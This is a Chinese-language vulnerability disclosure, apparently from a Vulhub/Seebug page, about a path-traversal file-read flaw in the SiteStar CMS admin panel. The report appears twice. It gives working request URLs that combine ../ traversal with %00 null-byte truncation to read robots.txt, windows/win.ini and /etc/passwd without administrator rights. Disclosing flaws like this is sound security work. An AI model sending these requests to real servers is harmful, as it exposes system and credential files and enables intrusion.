VULHUB ™

### 简要描述： 下载官方最新安装包，并去官方论坛打上了所有补丁。 ### 详细说明： 访问：http:/target/sitestar/admin/index.php?_m=../../robots.txt%00&_a=admin_add robots.txt是系统自带，虽然是后台文件，但是其实无需管理员权限即可访问 如图： [<img src="https://images.seebug.org/upload/201401/07180054fc2b9650d9698909d8f55dd03925d519.jpg" alt="aaa.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/07180054fc2b9650d9698909d8f55dd03925d519.jpg) win下:http://target/sitestar/admin/index.php?_m=../../../../../../../../../../windows/win.ini%00.jpg&_a=admin_add 未测试linux的环境，不过应该大同小异:http://target/sitestar/admin/index.php?_m=../../../../../../../../../../etc/passwd%00.jpg&_a=admin_add [<img src="https://images.seebug.org/upload/201401/07180447e09e96d3b56f3c5167eee09681622419.jpg" alt="bbb.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/07180447e09e96d3b56f3c5167eee09681622419.jpg) ### 漏洞证明： 略

### 简要描述： 下载官方最新安装包，并去官方论坛打上了所有补丁。 ### 详细说明： 访问：http:/target/sitestar/admin/index.php?_m=../../robots.txt%00&_a=admin_add robots.txt是系统自带，虽然是后台文件，但是其实无需管理员权限即可访问 如图： [<img src="https://images.seebug.org/upload/201401/07180054fc2b9650d9698909d8f55dd03925d519.jpg" alt="aaa.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/07180054fc2b9650d9698909d8f55dd03925d519.jpg) win下:http://target/sitestar/admin/index.php?_m=../../../../../../../../../../windows/win.ini%00.jpg&_a=admin_add 未测试linux的环境，不过应该大同小异:http://target/sitestar/admin/index.php?_m=../../../../../../../../../../etc/passwd%00.jpg&_a=admin_add [<img src="https://images.seebug.org/upload/201401/07180447e09e96d3b56f3c5167eee09681622419.jpg" alt="bbb.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/07180447e09e96d3b56f3c5167eee09681622419.jpg) ### 漏洞证明： 略